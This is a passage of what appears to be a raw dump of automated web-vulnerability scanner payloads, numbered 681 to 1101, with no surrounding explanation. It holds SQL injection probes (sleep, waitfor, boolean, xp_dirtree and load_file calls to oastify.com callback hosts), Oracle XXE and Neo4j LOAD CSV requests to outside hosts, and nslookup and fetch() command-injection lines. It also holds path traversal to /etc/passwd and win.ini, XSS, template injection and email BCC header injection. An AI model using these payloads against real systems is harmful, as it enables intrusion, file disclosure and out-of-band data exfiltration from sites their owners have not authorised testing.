  681. ‘|echo fwus7nzw0h 8v0riby7jl #xzwx


  682. kbpmmsxugz)(objectClass=*


  683. 827oojrgj5)(!(objectClass=*)


  684. kig739hpfi)(!(!(objectClass=*))


  685. oznrwtobwr)(!(!(!(objectClass=*)))


  686. ‘+(function(){if(typeof e90ta===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);e90ta=1;}}())+'


  687. “–>’–>`–>


  688. BCC:rrmsa0yh6ypy4gcbtohrfjcrhinbb1ztshk4asz@oastify.com
    voi: v


  689. >
    BCC:t4yun2bjj020hipd6qutslptuk0do3cv6jy6oud@oastify.com
    eqv: i


  690. (select extractvalue(xmltype(‘<!DOCTYPE root [ %jmpdh;]>’),’/l’) from dual)


  691. WvEMlU’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %jmpdh;]>’),’/l’) from dual)||’


  692. WvEMlU;declare @q varchar(99);set @q=’\\pg9qzynfvwewte19im6p4h1p6gc900xooec6zwnl.oasti’+’fy.com\tmp’; exec master.dbo.xp_dirtree @q;–


  693. WvEMlU’;declare @q varchar(99);set @q=’\\qxrrgz4gcxvxafiaznnqliiqnhtah1ep5gt8gy4n.oasti’+’fy.com\doa’; exec master.dbo.xp_dirtree @q;–


  694. WvEMlU);declare @q varchar(99);set @q=’\\mi8n1vpcxtgtvb36kj8m6e3m8de62xzlqde51vpk.oasti’+’fy.com\imf’; exec master.dbo.xp_dirtree @q;–


  695. WvEMlU’);declare @q varchar(99);set @q=’\\jsfkbsz97qqq58d3ugijgbdjiao3cu9i0bo3btzi.oasti’+’fy.com\euc’; exec master.dbo.xp_dirtree @q;–


  696. (select load_file(‘\\\\jaxktsh9pq8qn8v3cg0jybvj0a63uuriik6ct2hr.oastify.com\\bnf’))


  697. WvEMlU’+(select load_file(‘\\\\2lo34bss09j9yr6mnzb29u62bthm5d21t4hw4msb.oastify.com\\gxs’))+’


  698. WvEMlU'(select*from(select(sleep(20)))a)’


  699. WvEMlU+(select*from(select(sleep(20)))a)+


  700. WvEMlU’+(select*from(select(sleep(20)))a)+’


  701. WvEMlU and (select*from(select(sleep(20)))a)–


  702. WvEMlU’ and (select*from(select(sleep(20)))a)–


  703. WvEMlU,(select*from(select(sleep(20)))a)


  704. WvEMlU’ waitfor delay’0:0:20′–


  705. WvEMlU’)waitfor delay’0:0:20′–


  706. WvEMlU,0)waitfor delay’0:0:20′–


  707. WvEMlU’,0)waitfor delay’0:0:20′–


  708. WvEMlU31077209′ or ‘8802’=’8802


  709. WvEMlU52446632′ or ‘1023’=’1029


  710. WvEMlU26883903′ or ‘2633’=’2633


  711. WvEMlU30135233′ or ‘3225’=’3225′


  712. WvEMlUjrydh%3cscript%3ealert%281%29%3c%2fscript%3eio1mw


  713. WvEMlUd9z60%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3efadpv


  714. WvEMlU’+eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))+’


  715. eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))


  716. f3jgmoa5im1mg4oz5ctfr7oft6zznqkec24pudj.oastify.com


  717. nslookup -q=cname tifu12pjx0g0vi3dkq8t6l3t8ked24zssvgn3dr2.oastify.com.&


  718. WvEMlU|nslookup -q=cname mxnngv4cctvtabi6zjnmleimndt6hxela92wskh.oastify.com.&


  719. WvEMlU'”`0&nslookup -q=cname ct9dcl028jrj61ewv9jch4ecj3pwdnab7zzmpae.oastify.com.&`’


  720. WvEMlU&nslookup -q=cname r3vsm0ahiy1yggob5otrrjortizbn2kqfe71xpm.oastify.com.&’\”`0&nslookup -q=cname r3vsm0ahiy1yggob5otrrjortizbn2kqfe71xpm.oastify.com.&`’


  721. WvEMlU|echo fo9ii5u6jy qt6i2vpluc||a #’ |echo fo9ii5u6jy qt6i2vpluc||a #|” |echo fo9ii5u6jy qt6i2vpluc||a #


  722. WvEMlU”|echo 6lfdnzq55l 92h2p036nz ||


  723. WvEMlU’|echo 5ub5ctc86w xcfqqqlq3q #xzwx


  724. WvEMlU|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1


  725. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  726. ../../../../../../../../../../../../../../../../windows/win.ini


  727. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  728. ../../../../../../../../../../../../../../../../winnt/win.ini


  729. …\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini


  730. …/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini


  731. …\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini


  732. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini


  733. WvEMlU..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  734. WvEMlU../../../../../../../../../../../../../../../../windows/win.ini


  735. WvEMlU..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  736. WvEMlU../../../../../../../../../../../../../../../../winnt/win.ini


  737. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniWvEMlU


  738. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniWvEMlU


  739. ../../../../../../../../../../../../../../../../etc/passwd


  740. …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd


  741. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


  742. WvEMlU../../../../../../../../../../../../../../../../etc/passwd


  743. ../../../../../../../../../../../../../../../../etc/passwdWvEMlU


  744. WvEMlU’+(function(){if(typeof n0090===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);n0090=1;}}())+'


  745. WvEMlU
    BCC:p3tqmyafiw1wgeo95mtprhoptgz9n0koch09nzbo@oastify.com
    gry: e


  746. WvEMlU>
    BCC:rc7sv0jhryaypgxbeo2r0jxr2i8bw2tqlk9cw2kr@oastify.com
    iyc: v


  747. knbl6tua2rlr0984phdkbc8kdbj47uvmnafx5lu


  748. q6xrpzdglx4xjfra8nwquirqwh2aq1npfh39qzeo


  749. (select extractvalue(xmltype(‘<!DOCTYPE root [ %cdkgo;]>’),’/l’) from dual)


  750. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %cdkgo;]>’),’/l’) from dual)||’


  751. ‘;declare @q varchar(99);set @q=’\\ahvvu23kqevx42azmvpb2qk1rsxllb920qsdi17.oasti’+’fy.com\kzt’; exec master.dbo.xp_dirtree @q;–


  752. (select load_file(‘\\\\m3q7gepwcqh9qewb87bno26dd4jx7nvex2ppfd4.oastify.com\\fot’))


  753. ‘+(select load_file(‘\\\\525qfxofb9gspxvu7qa6nl5wcnig66uxxlp8fw4.oastify.com\\tft’))+’


  754. 94554098′ or ‘2354’=’2354


  755. 96172137′ or ‘9224’=’9233


  756. 30622739′ or ‘1371’=’1371


  757. 57084735′ or ‘9708’=’9708′


  758. 96698819′ or 3172=3172–


  759. 89357023′ or 1860=1862–


  760. 76888726′ or 3464=3464–


  761. 81802476′ or 6150=6150′–


  762. n464b33z82


  763. }}murht’/”<jocce


  764. %}m8d28’/”<bklkz


  765. rwwc7%>m5hgh’/”<mxn24


  766. j0k4dbmt9ne6nbt8548klz3aa1gu4kscg43urj.oastify.com


  767. &nslookup -q=cname v51ginr5ezjisnykagdwqb8mfdl69wxrlj89wy.oastify.com.&’\”`0&nslookup -q=cname v51ginr5ezjisnykagdwqb8mfdl69wxrlj89wy.oastify.com.&`’


  768. |echo m9oqdyz28x 2iclpzm0v8||a #’ |echo m9oqdyz28x 2iclpzm0v8||a #|” |echo m9oqdyz28x 2iclpzm0v8||a #


  769. ]]>><


  770. ‘+(function(){if(typeof vjevj===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);vjevj=1;}}())+'


  771. “–>’–>`–>


  772. BCC:nne80f9xwr1aafgcs8vo83qex53yrofg840rqff@oastify.com
    chf: r


  773. >
    BCC:rrmc4jd10v5eejkgwczsc7ui1972vsjkd85vvjk@oastify.com
    fcb: z


  774. $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  775. zifx98r0`z’z”${{%{{\


  776. ydis4i6dv0\z`z’z”${{%{{\


  777. xlevm2p4y0


  778. ” LOAD CSV FROM ‘https://QZqz3q6H.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl MATCH(:Z) WHERE “3”=”3


  779. “})LOAD CSV FROM ‘https://oE4tiqjM.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl MATCH(:Z{w:”3


  780. LOAD CSV FROM ‘https://VfiAh20A.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl//


  781. })LOAD CSV FROM ‘https://xU26aekZ.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl//


  782. ‘})LOAD CSV FROM ‘https://KUAli5Kn.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl MATCH(:Z{w:’3


  783. LOAD CSV FROM ‘https://KFSl222A.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl


  784. })LOAD CSV FROM ‘https://kIdznBp3.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl


  785. ‘ LOAD CSV FROM ‘https://cuQ5v0f5.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl//


  786. ‘})LOAD CSV FROM ‘https://C379qFrq.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl//


  787. ” LOAD CSV FROM ‘https://wN8AmGYl.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl//


  788. “})LOAD CSV FROM ‘https://2ySrPv3W.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl//


  789. ‘ LOAD CSV FROM ‘https://ToGtjxIA.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl MATCH(:Z) WHERE ‘3’=’3


  790. {!xmlparser v=’‘}


  791. fetch(‘https://p0q3odz70kq5zcrkd3mmakp72y8owd.oastify.com’)


  792. 39102825′ or ‘1804’=’1804


  793. 35016992′ or ‘5387’=’5394


  794. 81018983′ or ‘4059’=’4059


  795. 58395958′ or ‘5950’=’5950′


  796. 67352234′ or 5491=5491–


  797. 34576219′ or 7596=7603–


  798. 77412495′ or 2335=2335–


  799. 11766996′ or 7896=7896′–


  800. mmj053wco6


  801. document.location=1


  802. l6phbdocument.location=1klhpe


  803. l6phbdocument.location=1klhpe


  804. l6phb%3cscript%3edocument%2elocation%3d1%3c%2fscript%3eklhpe


  805. l6phbdocument.location=1klhpe


  806. r1vmrdocument.location=1z24o4


  807. r1vmrdocument.location=1z24o4


  808. r1vmr%3cScRiPt%3edocument%2elocation%3d1%3c%2fScRiPt%3ez24o4


  809. r1vmrdocument.location=1z24o4


  810. x7mlv%3ca%20b%3dc%3epzhv0


  811. lrl89${125*400}sjf30


  812. mp86i{{939*189}}ntbx6


  813. np7a8#{218*433}tt07w


  814. ktp7b[[274*163]]j16s5


  815. o9y2a${file.separator}dy953


  816. jsl7m%{277*266}ce9pw


  817. swgdz{{933|add:544}}dpmm4


  818. #set ($a=513*551) hi99h${a}tkt30


  819. dz47al5y8w


  820. ztqu4
    = 949*339


  821. igsdq{{.}}b79ea{{..}}ijx3o


  822. czpvx__${696*472}__p0n7r


  823. }}l6n4u’/”<r5qct


  824. %}yhtn0’/”<z24yf


  825. hn226%>u1oca’/”<zl3wp


  826. yztp8nm3bjrraxtjqvnc


  827. f0mut0ogwt%41l9wgtj1s9s


  828. 1utu64gena\\lfppbr7fw4


  829. 5acozrv7hfAoq0o5to4u1


  830. 5acozrv7hfAoq0o5to4u1


  831. |echo v9qwv20s8z 6xyi64h5wb||a #’ |echo v9qwv20s8z 6xyi64h5wb||a #|” |echo v9qwv20s8z 6xyi64h5wb||a #


  832. ]]>><


  833. ‘+(function(){if(typeof m032v===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);m032v=1;}}())+'


  834. “–>’–>`–>


  835. xz340fku197d08zbd7wrtqv


  836. $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  837. rgpvw4`z’z”${{%{{\


  838. jofs76fht8\z`z’z”${{%{{\


  839. wor67e3


  840. RHKqtL'(select*from(select(sleep(20)))a)’


  841. RHKqtL+(select*from(select(sleep(20)))a)+


  842. RHKqtL’+(select*from(select(sleep(20)))a)+’


  843. RHKqtL’ waitfor delay’0:0:20′–


  844. RHKqtL’)waitfor delay’0:0:20′–


  845. RHKqtL45378435′ or ‘6224’=’6224


  846. RHKqtL18366831′ or ‘1216’=’1225


  847. RHKqtL71497648′ or ‘2253’=’2253


  848. RHKqtL71634894′ or ‘8571’=’8571′


  849. RHKqtLltejb%3cscript%3ealert%281%29%3c%2fscript%3et28hj


  850. RHKqtLe9hcb%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3elrodu


  851. eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))


  852. RHKqtL|echo 7z5bulzz07 v4qldguiin||a #’ |echo 7z5bulzz07 v4qldguiin||a #|” |echo 7z5bulzz07 v4qldguiin||a #


  853. RHKqtL|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1


  854. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  855. ../../../../../../../../../../../../../../../../windows/win.ini


  856. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  857. ../../../../../../../../../../../../../../../../winnt/win.ini


  858. …\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini


  859. …/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini


  860. …\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini


  861. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini


  862. RHKqtL..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  863. RHKqtL../../../../../../../../../../../../../../../../windows/win.ini


  864. RHKqtL..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  865. RHKqtL../../../../../../../../../../../../../../../../winnt/win.ini


  866. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniRHKqtL


  867. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniRHKqtL


  868. ../../../../../../../../../../../../../../../../etc/passwd


  869. …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd


  870. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


  871. RHKqtL../../../../../../../../../../../../../../../../etc/passwd


  872. ../../../../../../../../../../../../../../../../etc/passwdRHKqtL


  873. RHKqtL’+(function(){if(typeof c0gd0===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);c0gd0=1;}}())+'


  874. RHKqtL$zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  875. RHKqtL%26zq=x%3c%61%60%27%22%24%7b%7b%5c


  876. RHKqtL|zqy=x%3c%61%60%27%22%24%7b%7b%5c


  877. …/….///…/….///…/….///…/….///…/….///…/….///etc/passwd


  878. …/…//…/…//…/…//…/…//…/…//…/…//…/…//…/…//etc/passwd


  879. ../../../../../../../../../../../../../../../../etc/passwd%00.html


  880. ../../../../../../../../../../../../../../../../windows/win.ini%00.html


  881. %c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml


  882. %E5%98%8A%E5%98%8DX-Injection:%20test


  883. 51578308′ or ‘1141’=’1141


  884. 77081143′ or ‘8981’=’8985


  885. 84308023′ or ‘9117’=’9117


  886. 25363983′ or ‘3960’=’3960′


  887. NNILzh'(select*from(select(sleep(20)))a)’


  888. NNILzh+(select*from(select(sleep(20)))a)+


  889. NNILzh’+(select*from(select(sleep(20)))a)+’


  890. 13486538′ or 4626=4626–


  891. NNILzh’ waitfor delay’0:0:20′–


  892. 34257815′ or 3284=3292–


  893. NNILzh’)waitfor delay’0:0:20′–


  894. 43024737′ or 7119=7119–


  895. 35508152′ or 7375=7375′–


  896. NNILzh84951687′ or ‘8913’=’8913


  897. NNILzh93981737′ or ‘4732’=’4740


  898. 9tn6dfyr6t


  899. NNILzh86606603′ or ‘6457’=’6457


  900. NNILzh81042792′ or ‘5485’=’5485′


  901. document%2elocation%3d1


  902. amzu6document.location=1mfaol


  903. amzu6document.location=1mfaol


  904. amzu6%3cscript%3edocument%2elocation%3d1%3c%2fscript%3emfaol


  905. amzu6document.location=1mfaol


  906. sfddodocument.location=1dcl79


  907. sfddodocument.location=1dcl79


  908. sfddo%3cScRiPt%3edocument%2elocation%3d1%3c%2fScRiPt%3edcl79


  909. sfddodocument.location=1dcl79


  910. NNILzhfnh3s%3cscript%3ealert%281%29%3c%2fscript%3eckv4e


  911. cqak9%3ca%20b%3dc%3efkpzg


  912. bavo2${117*601}ny87h


  913. NNILzhye0g0%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3efdf5k


  914. hjtgs{{418*977}}yrfa7


  915. ny0jp#{832*406}e6r15


  916. jkq73[[880*796]]z11op


  917. qccgm${file.separator}e50vw


  918. tp07e%{189*466}bkktw


  919. bh74t{{542|add:808}}bdp4b


  920. #set ($a=990*242) p7cdj${a}fdgiu


  921. nfzdcupm1b


  922. m3rdv
    = 956*249


  923. p7amt{{.}}tcx1l{{..}}logo1


  924. g7f8v__${580*351}__yav65


  925. }}sjaqq’/”<nww7i


  926. %}uog6q’/”<y4vmj


  927. jfkyx%>b7mys’/”<muv4j


  928. 7dagxs5ycudjrndtsj8s


  929. io03llrgpe%41oryyzamcog


  930. pywohsi73j\\lnf1xz139d


  931. bgo76p8d1mAxrvmr74v1e


  932. bgo76p8d1mAxrvmr74v1e


  933. |echo v5as9j1qfx 22t32htn1h||a #’ |echo v5as9j1qfx 22t32htn1h||a #|” |echo v5as9j1qfx 22t32htn1h||a #


  934. eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))


  935. NNILzh|echo ulk7989eo0 s7wevbeepv||a #’ |echo ulk7989eo0 s7wevbeepv||a #|” |echo ulk7989eo0 s7wevbeepv||a #


  936. NNILzh|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1


  937. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  938. ../../../../../../../../../../../../../../../../windows/win.ini


  939. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  940. ../../../../../../../../../../../../../../../../winnt/win.ini


  941. …\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini


  942. …/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini


  943. …\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini


  944. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini


  945. ]]>><


  946. NNILzh..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  947. NNILzh../../../../../../../../../../../../../../../../windows/win.ini


  948. ‘+(function(){if(typeof pj0eq===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);pj0eq=1;}}())+'


  949. NNILzh..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  950. NNILzh../../../../../../../../../../../../../../../../winnt/win.ini


  951. “–>’–>`–>


  952. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniNNILzh


  953. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniNNILzh


  954. ../../../../../../../../../../../../../../../../etc/passwd


  955. $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  956. k1x0i56`z’z”${{%{{\


  957. …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd


  958. ixejg1\z`z’z”${{%{{\


  959. wnvr3


  960. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


  961. NNILzh../../../../../../../../../../../../../../../../etc/passwd


  962. ../../../../../../../../../../../../../../../../etc/passwdNNILzh


  963. NNILzh’+(function(){if(typeof hw1u6===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);hw1u6=1;}}())+'


  964. NNILzh$zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  965. NNILzh%26zq=x%3c%61%60%27%22%24%7b%7b%5c


  966. NNILzh|zqy=x%3c%61%60%27%22%24%7b%7b%5c


  967. …/….///…/….///…/….///…/….///…/….///…/….///etc/passwd


  968. …/…//…/…//…/…//…/…//…/…//…/…//…/…//…/…//etc/passwd


  969. ../../../../../../../../../../../../../../../../etc/passwd%00.html


  970. ../../../../../../../../../../../../../../../../windows/win.ini%00.html


  971. %c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml


  972. %E5%98%8A%E5%98%8DX-Injection:%20test


  973. 44563958′ or ‘5229’=’5229


  974. 31449372′ or ‘8488’=’8489


  975. PjctNs'(select*from(select(sleep(20)))a)’


  976. 62325861′ or ‘7644’=’7644


  977. PjctNs+(select*from(select(sleep(20)))a)+


  978. PjctNs’+(select*from(select(sleep(20)))a)+’


  979. 36348906′ or ‘2929’=’2929′


  980. PjctNs’ waitfor delay’0:0:20′–


  981. PjctNs’)waitfor delay’0:0:20′–


  982. 71713847′ or 8947=8947–


  983. 69008820′ or 8498=8502–


  984. 98524674′ or 6786=6786–


  985. PjctNs85087430′ or ‘5779’=’5779


  986. PjctNs84478185′ or ‘5572’=’5577


  987. 82874417′ or 9934=9934′–


  988. PjctNs63244281′ or ‘4950’=’4950


  989. wlph74pdwx


  990. PjctNs34726644′ or ‘9656’=’9656′


  991. document.title=1


  992. ylabgdocument.title=1zvkqm


  993. ylabgdocument.title=1zvkqm


  994. ylabg%3cscript%3edocument%2etitle%3d1%3c%2fscript%3ezvkqm


  995. ylabgdocument.title=1zvkqm


  996. d76midocument.title=1m19bd


  997. d76midocument.title=1m19bd


  998. d76mi%3cScRiPt%3edocument%2etitle%3d1%3c%2fScRiPt%3em19bd


  999. d76midocument.title=1m19bd


  1000. PjctNsrx7ae%3cscript%3ealert%281%29%3c%2fscript%3euqp2l


  1001. rkty4%3ca%20b%3dc%3errahi


  1002. PjctNsxi2u0%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3ewul8s


  1003. g0g3p${346*367}l8lev


  1004. icmqk{{929*338}}qlh2d


  1005. lybvp#{261*707}qwj9o


  1006. qag40[[289*306]]icq1y


  1007. fz1x9${file.separator}uvzar


  1008. xmen5%{537*605}jlgkg


  1009. kyaex{{343|add:510}}xcplk


  1010. #set ($a=137*545) ks22y${a}jvl4v


  1011. lon83l50v8


  1012. sd119
    = 104*112


  1013. cv88c{{.}}awgee{{..}}v3mi9


  1014. n8q2l__${447*204}__d80dg


  1015. }}jocxi’/”<pbw9m


  1016. %}v1n87’/”<ca8wm


  1017. cmdk3%>y8q7n’/”<zmuqz


  1018. sn2m9lqugj82ubjwyesm


  1019. ki0nwnph8v%41zz52u94k2v


  1020. 41yd7mtm95\\l3j5id7hqx


  1021. ptfk6n9uhcAxki3qv68k2


  1022. ptfk6n9uhcAxki3qv68k2


  1023. eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))


  1024. |echo llg60enioi eq98nsxwkq||a #’ |echo llg60enioi eq98nsxwkq||a #|” |echo llg60enioi eq98nsxwkq||a #


  1025. ]]>><


  1026. ‘+(function(){if(typeof qy00p===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);qy00p=1;}}())+'


  1027. “–>’–>`–>


  1028. $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  1029. jk4e1`z’z”${{%{{\


  1030. wbmf0vo0zz1\z`z’z”${{%{{\


  1031. k45z0s4


  1032. PjctNs|echo gllafykk81 374kqu1jj0||a #’ |echo gllafykk81 374kqu1jj0||a #|” |echo gllafykk81 374kqu1jj0||a #


  1033. PjctNs|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1


  1034. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  1035. ../../../../../../../../../../../../../../../../windows/win.ini


  1036. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  1037. ../../../../../../../../../../../../../../../../winnt/win.ini


  1038. …\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini


  1039. …/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini


  1040. …\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini


  1041. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini


  1042. PjctNs..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  1043. PjctNs../../../../../../../../../../../../../../../../windows/win.ini


  1044. PjctNs..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  1045. PjctNs../../../../../../../../../../../../../../../../winnt/win.ini


  1046. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniPjctNs


  1047. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniPjctNs


  1048. ../../../../../../../../../../../../../../../../etc/passwd


  1049. …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd


  1050. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


  1051. PjctNs../../../../../../../../../../../../../../../../etc/passwd


  1052. ../../../../../../../../../../../../../../../../etc/passwdPjctNs


  1053. PjctNs’+(function(){if(typeof k3eb7===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);k3eb7=1;}}())+'


  1054. PjctNs$zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  1055. PjctNs%26zq=x%3c%61%60%27%22%24%7b%7b%5c


  1056. PjctNs|zqy=x%3c%61%60%27%22%24%7b%7b%5c


  1057. …/….///…/….///…/….///…/….///…/….///…/….///etc/passwd


  1058. …/…//…/…//…/…//…/…//…/…//…/…//…/…//…/…//etc/passwd


  1059. ../../../../../../../../../../../../../../../../etc/passwd%00.html


  1060. ../../../../../../../../../../../../../../../../windows/win.ini%00.html


  1061. %c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml


  1062. %E5%98%8A%E5%98%8DX-Injection:%20test


  1063. 71650378′ or ‘4630’=’4630


  1064. 14769657′ or ‘5261’=’5262


  1065. 75355713′ or ‘1700’=’1700


  1066. 19465542′ or ‘9072’=’9072′


  1067. 66870937′ or 4435=4435–


  1068. 93964075′ or 2184=2191–


  1069. 47554441′ or 8862=8862–


  1070. 17124814′ or 6951=6951′–


  1071. z5fknvvimo


  1072. document%2etitle%3d1


  1073. ia1rddocument.title=1bun39


  1074. ia1rddocument.title=1bun39


  1075. ia1rd%3cscript%3edocument%2etitle%3d1%3c%2fscript%3ebun39


  1076. ia1rddocument.title=1bun39


  1077. y5fiudocument.title=1f8n9m


  1078. y5fiudocument.title=1f8n9m


  1079. y5fiu%3cScRiPt%3edocument%2etitle%3d1%3c%2fScRiPt%3ef8n9m


  1080. y5fiudocument.title=1f8n9m


  1081. clgkx%3ca%20b%3dc%3eh3za7


  1082. duisr${285*281}umndk


  1083. wkw7v{{994*307}}q4l5m


  1084. leaw2#{643*256}argul


  1085. sq2kz[[833*683]]mrmbc


  1086. svdnq${file.separator}zdq75


  1087. u8eti%{972*300}k7dum


  1088. p0l4q{{952|add:594}}ff7dc


  1089. #set ($a=123*425) oigvy${a}zlq1c


  1090. p7jdrk0nch


  1091. saivb
    = 591*296


  1092. g8ygb{{.}}qthd1{{..}}lvsa8


  1093. tfsjn__${998*631}__q0x3v


  1094. }}w7h9i’/”<gew9s


  1095. %}okupp’/”<t1m0g


  1096. pl7tc%>jbli5’/”<pv3zj


  1097. r3rqbe8kckm6vtpfzxd3


  1098. ljxpccb2qg%411iene5gcgp


  1099. ieq7sumrm6\\lza70j1uh3


  1100. m4ztba6j9rAjpk83duf5s


  1101. m4ztba6j9rAjpk83duf5s


